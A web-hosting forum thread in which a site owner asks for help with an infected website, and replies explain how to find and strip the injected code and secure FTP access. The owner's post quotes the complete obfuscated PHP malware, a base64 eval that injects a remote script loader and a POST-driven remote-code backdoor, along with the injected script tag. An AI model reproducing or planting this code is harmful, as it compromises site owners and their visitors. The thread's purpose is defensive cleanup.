i got tired with my site virus infection

hello
my site is infected with a virus which closes my site when open it due to a php script which i discovered its code in the top of my page when i checked my site in c panel the code is

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZHhlbScpKXtmdW5jdGlvbiBkeGVtKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJ4dmRXbHphV0Z1WVdwaGVucGpiSFZpTG01bGRDOXVaWGR6YVhSbEwyMTFjMmx4ZFdWelgyRnBiR3hsZFhKekxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBkeGVtMigkYSwkYiwkYywkZCl7Z2xvYmFsJGR4ZW0xOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRkeGVtMSkpY2FsbF91c2VyX2Z1bmMoJGR4ZW0xLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkeGVtJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZHhlbScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRkeGVtbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZHhlbTInKSkhPSdkeGVtMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

and when i check ths source of my site using firefox
i see that php script

</head><script src=http://louisianajazzclub.net/newsite/musiques_ailleurs.php ></script>

which is strange to my site when i deleted the long code above nothing changed and the site began to lose visitors because google has reported my site to harm computers

 

You need to remove all the malscripts from your site and then request a review from Google's Webmaster Tools.

If you have a known good backup, you can delete your site, then restore it from backup. If you don't delete it first, you can miss backdoor files that hackers insert on websites so they can re-infect them after you've cleaned it.

Do you have your site downloaded onto your PC? If so, you can use a tool like grepWin to clean your site. It's free. Google it.

For the search string to remove the first line you identified you can use:

<\?php\s*eval\(base64_decode\(.*?\)\);\s*\?>

Code (markup):

And for the other string you found you can use:

<script\s*src=http:\/\/.*?\.php\s><\/script>

Code (markup):

Then set these options:

uncheck Search case-sensitive
check Dot matches newline
check Create backup files
uncheck Treat files as UTF8

select All sizes
check Include system items
check Include hidden items
check Include subfolders

Then set your Search in: to the folder where you've downloaded your website files and select Search first.

Then look at the files in the Search results window. You can right-click on them to see the malscript.

Then close the file and hit Replace. It will create backups of your original (infected) files and you'll have clean files to upload to your website.

Then, since this is typically the result of a virus that steals FTP login credentials, you'll have to first change all FTP passwords, then scan all PCs with FTP access to your website for viruses.

These viruses know how to evade detection of the currently installed anti-virus programs so you may need to use something different.

Many have had good success using one of these: Avast, F-Prot or Kaspersky.

Also, if you're using one of the free FTP programs, many of them, like FileZilla and CuteFTP store their saved logins in a plain text file which makes it really easy for the virus to find and steal the FTP credentials.

I use WS_FTP because they encrypt their passwords.

Post back here if you have further questions.

 

Hi,
I'm just one more who founded some malware or virus around my server.
The site atacked was a OSCommerce installation and its all over the php files, and after decoding the encoded string I found all the "bad" files at \admin\includes\languages\english\modules\index folder.
Can you check the screenshot atached to see if do you have any identic files.
This files are full of information about other webpages, and the most used word is the affiliate program company "Forex".

Thanks a lot

 

If your site is based on osCommerce you might want to check out this link:

http://www.webcentricdesign.co.uk/blog/?p=16